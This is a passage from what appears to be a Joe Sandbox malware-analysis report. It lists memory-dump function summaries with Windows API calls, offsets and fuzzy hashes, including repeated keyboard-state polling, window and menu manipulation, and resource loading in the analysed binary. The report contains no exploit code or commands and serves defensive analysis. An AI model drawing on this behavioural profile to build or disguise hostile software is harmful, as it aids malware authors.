                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00230CD2
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230CE6
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00230CFE
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00230D2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory$_wcscat$AttributesFile__wsplitpath
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 4196653570-438819550
                                                                                                                                                                  • Opcode ID: 1c6a4ec98043a69b8ef3fcbf0aa717dab8f6303ea165d8bb9ec6dfd2806f37a6
                                                                                                                                                                  • Instruction ID: 288157889862a58e2ca963b4ef66552c2b1c13a0ae51cf01b090cbd990be52a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c6a4ec98043a69b8ef3fcbf0aa717dab8f6303ea165d8bb9ec6dfd2806f37a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1681C5B15243099FC724DF64C894AAAB7E8FF98304F148D2AF885C7251E770ED55CB62
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 0022D567
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 0022D589
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D5DC
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D68D
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D6AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2116804098-2391861430
                                                                                                                                                                  • Opcode ID: c89bc926a5d7597056dbe730bcd61ea3e50e2e58b43c396de80faa8da5bfc9b0
                                                                                                                                                                  • Instruction ID: ff8ac549b2f5b1d692deb2f31cc829ece379108d0cd7803b8acc9d3582bd7335
                                                                                                                                                                  • Opcode Fuzzy Hash: c89bc926a5d7597056dbe730bcd61ea3e50e2e58b43c396de80faa8da5bfc9b0
                                                                                                                                                                  • Instruction Fuzzy Hash: C551D171810659BBCB14EBE1ED46EEEB779AF14304F104065F105B20A2EB716F68CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0022D37F
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0022D3A0
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D3F3
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D499
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D4B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2116804098-3420473620
                                                                                                                                                                  • Opcode ID: 3f33526857adeebcea3e12d5c688212ee233c9f4d14850ea7a0454ba1140cc4c
                                                                                                                                                                  • Instruction ID: 7eb85eb76041526c02bc5bfd19ad346213f3e14af52e1a3e0e0682786cd7c928
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f33526857adeebcea3e12d5c688212ee233c9f4d14850ea7a0454ba1140cc4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4251D071810659BBCB15FBE1ED46EEEB779AF14304F104066B105A20A2EB756F68CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __swprintf.LIBCMT ref: 00227226
                                                                                                                                                                  • __swprintf.LIBCMT ref: 00227233
                                                                                                                                                                    • Part of subcall function 0020234B: __woutput_l.LIBCMT ref: 002023A4
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 0022725D
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00227269
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00227276
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00227296
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002272A8
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002272B7
                                                                                                                                                                  • LockResource.KERNEL32(?), ref: 002272C3
                                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00227322
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                  • String ID: L6)
                                                                                                                                                                  • API String ID: 1433390588-1299162287
                                                                                                                                                                  • Opcode ID: b7af3713ce7b2a0f80dd5d03433a6bcf5a1a3889ded37b65688149ae4235bcee
                                                                                                                                                                  • Instruction ID: 7c611e1559ef452a4a699649bd117e0d1bf3b871fb5f7138e21eaf8b7198dafb
                                                                                                                                                                  • Opcode Fuzzy Hash: b7af3713ce7b2a0f80dd5d03433a6bcf5a1a3889ded37b65688149ae4235bcee
                                                                                                                                                                  • Instruction Fuzzy Hash: 73318071A1826ABBDB019FA0AC99AAB7BA8FF05340F008425FD01D2151E774D960DAB0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0022843F
                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00228455
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00228466
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00228478
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00228489
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                                                  • Opcode ID: 6cf94cb29272e3fb850b723d68fba43e8efceb8d13d535f831c9c7c864700030
                                                                                                                                                                  • Instruction ID: 44a0ee3131cd29a1de7378427ddfad60dddd077718a62d7536516d74ba8de5a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 6cf94cb29272e3fb850b723d68fba43e8efceb8d13d535f831c9c7c864700030
                                                                                                                                                                  • Instruction Fuzzy Hash: 55114261A601AA7ADB20F7E2DC4ADFF7A7CFBA2B04F440429B411A20D1DFA05E55C5B1
                                                                                                                                                                  APIs
                                                                                                                                                                  • timeGetTime.WINMM ref: 0022809C
                                                                                                                                                                    • Part of subcall function 001FE3A5: timeGetTime.WINMM(?,75C0B400,00256163), ref: 001FE3A9
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 002280C8
                                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002280EC
                                                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0022810E
                                                                                                                                                                  • SetActiveWindow.USER32 ref: 0022812D
                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0022813B
                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0022815A
                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00228165
                                                                                                                                                                  • IsWindow.USER32 ref: 00228171
                                                                                                                                                                  • EndDialog.USER32(00000000), ref: 00228182
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                                  • Opcode ID: e58ff74a2ceb909b8fe60e1460ba66a6134328a834ea9b87a7c333ddfaf91af4
                                                                                                                                                                  • Instruction ID: 17bac4c97fcb07603a471e1c7800aa1faf66a7c81e299974b8b03a46cc83f8b1
                                                                                                                                                                  • Opcode Fuzzy Hash: e58ff74a2ceb909b8fe60e1460ba66a6134328a834ea9b87a7c333ddfaf91af4
                                                                                                                                                                  • Instruction Fuzzy Hash: 2721A170750219BFE7229FA1FC8DB277FAAF71A388B544114F506822A1DFB28D258A11
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3566271842-0
                                                                                                                                                                  • Opcode ID: fb60ecd58c0141c5196f2e1ebc3791120b3ccdfafeeb47717d2be060381c7018
                                                                                                                                                                  • Instruction ID: 30a438b7cc83a567dcfcd8a18e38520ad7552c69f99ec2255daedde0f9ee8928
                                                                                                                                                                  • Opcode Fuzzy Hash: fb60ecd58c0141c5196f2e1ebc3791120b3ccdfafeeb47717d2be060381c7018
                                                                                                                                                                  • Instruction Fuzzy Hash: 26713EB5A10219AFDB10DFA4D898ADEB7B8FF48314F048495E909EB251DB70EE51CF90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00223908
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00223973
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00223993
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 002239AA
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002239D9
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 002239EA
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00223A16
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00223A24
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00223A4D
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00223A5B
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00223A84
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00223A92
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: 59b5a8e709fe5d8f2a54e2c44169436708a299321faef61f4ae45e8694d5d76d
                                                                                                                                                                  • Instruction ID: b1afef5a3514940231b92084ea79b542ebc33fd5e96d6ad514bf1325a85fdd03
                                                                                                                                                                  • Opcode Fuzzy Hash: 59b5a8e709fe5d8f2a54e2c44169436708a299321faef61f4ae45e8694d5d76d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C510C30A147A939FB35EFE4A4017EABFF45F11340F08859ED5C25A1C2DA589B9CCB62
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0021FB19
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FB2B
                                                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0021FB89
                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0021FB94
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FBA6
                                                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0021FBFC
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021FC0A
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FC1B
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0021FC5E
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0021FC6C
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0021FC89
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0021FC96
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                  • Opcode ID: 660f9686e0b99c274454e439558a9ddbeab3440d1aad278e91a999b58439e0e2
                                                                                                                                                                  • Instruction ID: f1d671a3e07dcc865ad51d2accc6bcb045b4592451f4d2d53ab1ae21eb3847ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 660f9686e0b99c274454e439558a9ddbeab3440d1aad278e91a999b58439e0e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 30514671B00209AFDB04CF69DD99AAEBBB9FB98314F14813DF515D7290D7B09D408B50
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 001FB067
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                                  • Opcode ID: 0ba478f6fe476d70336db64f2d9ad427530108b5caabacd97c602dd610fa7b91
                                                                                                                                                                  • Instruction ID: ea3651c02c8455661cd89931d95341d441993882fb5add817d7c64b4ca35c58e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ba478f6fe476d70336db64f2d9ad427530108b5caabacd97c602dd610fa7b91
                                                                                                                                                                  • Instruction Fuzzy Hash: C441C631608548AFDF245F28ECC8BBA3B75AB46731F198261FE758A1E1DB718D41CB21
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 136442275-0
                                                                                                                                                                  • Opcode ID: 129d0d39416e60f51489084f7058afaa2ea2145f12f5af59f70482a0dd648192
                                                                                                                                                                  • Instruction ID: db2500c2232b39e1c47852ac1fb91510c2c4b2e2ef1322ed385a446604953636
                                                                                                                                                                  • Opcode Fuzzy Hash: 129d0d39416e60f51489084f7058afaa2ea2145f12f5af59f70482a0dd648192
                                                                                                                                                                  • Instruction Fuzzy Hash: 6641117281422CAADB21EB90DC55EDE73BCBF48310F1041E6B519A2081EB71ABE4CF64
                                                                                                                                                                  APIs
                                                                                                                                                                  • __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                  • __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 00202177: _xtow@16.LIBCMT ref: 00202198
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                                                                  • Opcode ID: 7791bc0a2e1c63ec6d59a921233465f0c4452440f8617a63b2acabe34e92f877
                                                                                                                                                                  • Instruction ID: 4301d13f3028044dc7becd74ea286649c372c6cb2fe9ab424097b711e0d155ab
                                                                                                                                                                  • Opcode Fuzzy Hash: 7791bc0a2e1c63ec6d59a921233465f0c4452440f8617a63b2acabe34e92f877
                                                                                                                                                                  • Instruction Fuzzy Hash: 4941F331524A069BEB24DF38D841F6AB3E5FF44310F20446AE54ED72D2EA319A55CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00205CCA
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205D63
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205D99
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205DB6
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E0C
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E28
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E3F
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E5D
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E74
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E92
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00205F03
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                                                  • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                                  • Instruction ID: 8b54c0f00c1114a385dbd7501d8d9560c4a2848d257be5bd852dbcbdfb908a3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A71C671A21F27ABE7149E68CC41BABB3F8AF14724F14412AF554D76C2E770DA608F90
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225816
                                                                                                                                                                  • GetMenuItemInfoW.USER32(002A18F0,000000FF,00000000,00000030), ref: 00225877
                                                                                                                                                                  • SetMenuItemInfoW.USER32(002A18F0,00000004,00000000,00000030), ref: 002258AD
                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 002258BF
                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00225903
                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0022591F
                                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00225949
                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 0022598E
                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002259D4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002259E8
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00225A09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                                                  • Opcode ID: 5160d5a00508dbb5bdf7751193002de1fb332e674a5be27b0a8130e019f2d617
                                                                                                                                                                  • Instruction ID: 41c8b5be1c40989b38d33580134713cf44fc888fa3c88d58b7a232633bbf2e2a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5160d5a00508dbb5bdf7751193002de1fb332e674a5be27b0a8130e019f2d617
                                                                                                                                                                  • Instruction Fuzzy Hash: 0661E37092067AFFDB10CFE4EC88AAE7BB8EB05314F148119F442A7251D7B0AD65CB61
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00249AA5
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00249AA8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00249ACC
                                                                                                                                                                  • _memset.LIBCMT ref: 00249ADD
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00249AEF
                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00249B67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                                                  • Opcode ID: 1e247cd07a4bda4f2b3429723c7cf14938c63418771ca0b8056e465ff1f53f05
                                                                                                                                                                  • Instruction ID: c849d2ca78da984205cfe6c8c217fc6e2249696c5047fcbab7c2d06b6cce7774
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e247cd07a4bda4f2b3429723c7cf14938c63418771ca0b8056e465ff1f53f05
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E618B75A10208AFDB15DFA4DC81EEE77F8EF09710F10415AFA14A7291D774ADA1CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00223591
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00223612
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 0022362D
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00223647
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 0022365C
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00223674
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00223686
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0022369E
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 002236B0
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002236C8
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 002236DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
